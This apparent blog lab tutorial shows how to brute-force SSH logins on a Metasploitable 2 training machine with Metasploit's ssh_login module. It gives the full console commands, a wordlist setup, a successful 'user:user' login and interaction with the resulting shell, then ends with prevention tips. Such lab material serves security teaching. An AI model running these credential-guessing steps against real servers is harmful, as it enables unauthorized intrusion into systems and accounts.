Metasploitable 2- server: Brute-forcing the SSH Log in session using Metasploit Console (msfconsole)

In my previous lab, I demonstrated to you, how A Brute-Force Attack works on a server.

Goal: Brute forcing the Metasploitable server and gain SSH session.

Follow the below steps to get a login session:


Step 1: Start the msfconsole

Use the below command to start the Metasploit console in a proper way:

┌─[✗]─[mrdev@mr-dev]─[~]
└──╼ $sudo msfdb init
[+] Starting database
[i] The database appears to be already configured, skipping initialization
┌─[mrdev@mr-dev]─[~]
└──╼ $sudo msfconsole
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Search can apply complex filters such as 
search cve:2009 type:exploit, see all the filters 
with help search

msf6 >

Step 2: Search the Auxiliary module

Next, we load up the scanner module in Metasploit:

msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) >


Step 3: Configure the ssh_login auxiliary module

Once you set the module to auxiliary mode then set the following configuration:

Note: You need a Wordlist file to manage, the brute force attack. At this place, I use my previous wordlist from the previous chapter.

msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none,
                                                 user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                                ki/Using-Metasploit
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE wordlist.lst
PASS_FILE => wordlist.lst
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE wordlist.lst
USER_FILE => wordlist.lst
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login) >

Step 4: Apply the Run command

Once you configure the setting, execute the run command:

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.56.3:22 - Starting bruteforce
[+] 192.168.56.3:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.56.1:45003 -> 192.168.56.3:22) at 2022-01-15 02:24:31 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

Step 5: Interact with shell

From step 4 you can find out that auxiliary module execution is completed and a command shell session opened. You can find out the session using the sessions command and then connect:

msf6 auxiliary(scanner/ssh/ssh_login) > sessions 

Active sessions
===============

  Id  Name  Type         Information                      Connection
  --  ----  ----         -----------                      ----------
  1         shell linux  SSH user:user (192.168.56.3:22)  192.168.56.1:45003 -> 192.168.56.3:22 (192.168.56.3)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

SSH user:user (192.168.56.3:22)
id
uid=1001(user) gid=1001(user) groups=1001(user)
ls
cd ..
ls
ftp
msfadmin
service
user
^Z
Background session 1? [y/N]  y
msf6 auxiliary(scanner/ssh/ssh_login) > exit -y
┌─[mrdev@mr-dev]─[~]
└──╼ $

Prevention:

There are many methods to stop or prevent brute force attacks.

The most obvious is a strong password policy. Each web application or public server should enforce the use of strong passwords. For example, standard user accounts should have at least eight letters, a number, uppercase, and lowercase letters, and a special character. Moreover, servers should require frequent password changes.

Let’s investigate other ways to prevent a brute-force attack.

  • Limit failed login attempts
  • Make the root user inaccessible via SSH by editing the sshd_config file
  • Don’t use a default port, edit the port line in your sshd_configfile
  • Use Captcha
  • Limit logins to a specified IP address or range
  • Two-factor authentication
  • Unique login URLs
  • Monitor server logs
Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!